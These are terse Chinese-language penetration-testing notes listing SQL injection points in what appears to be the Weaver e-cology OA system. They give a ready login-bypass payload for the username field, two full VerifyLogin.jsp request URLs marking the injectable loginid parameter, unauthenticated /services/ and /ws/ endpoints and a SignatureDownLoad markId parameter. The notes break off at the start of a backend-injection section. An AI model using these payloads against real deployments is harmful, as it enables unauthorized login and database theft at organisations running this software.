SQL注入
前台SQL注入
用户名:admin' or password like 'c4ca4238a0b923820dcc509a6f75849b' and 'a'='a
密码: 1
验证页面参数 - loginid
(1)/login/VerifyLogin.jsp?loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.jsp%3FtemplateId%3D41%26logintype%3D1%26gopage%3D&logintype=1&fontName=%CE%A2%C8%ED%D1%C5%BA%DA&message=&gopage=&formmethod=get&rnd=&serial=&username=&isie=false&loginid=test&userpassword=11111111111&tokenAuthKey=&islanguid=7&submit=
(2)/login/VerifyLogin.jsp?loginfile=%2Flogin%2Flogin.jsp%2F%3FtemplateId%3D11%26logintype%3D1%26gopage%3D&logintype=1&fontName=%CE%A2%C8%ED%D1%C5%BA%DA&message=&gopage=&formmethod=post&rnd=&serial=&username=&isie=false&loginid=test&userpassword=1111111111111&tokenAuthKey=&islanguid=7&submit=
未授权访问页面
//services/ 存在注入
/ws/ 存在注入
(3)
/weaver/weaver.file.SignatureDownLoad?markId=1 --参数markld
后台SQL注入
(1)
首先用使用测试账户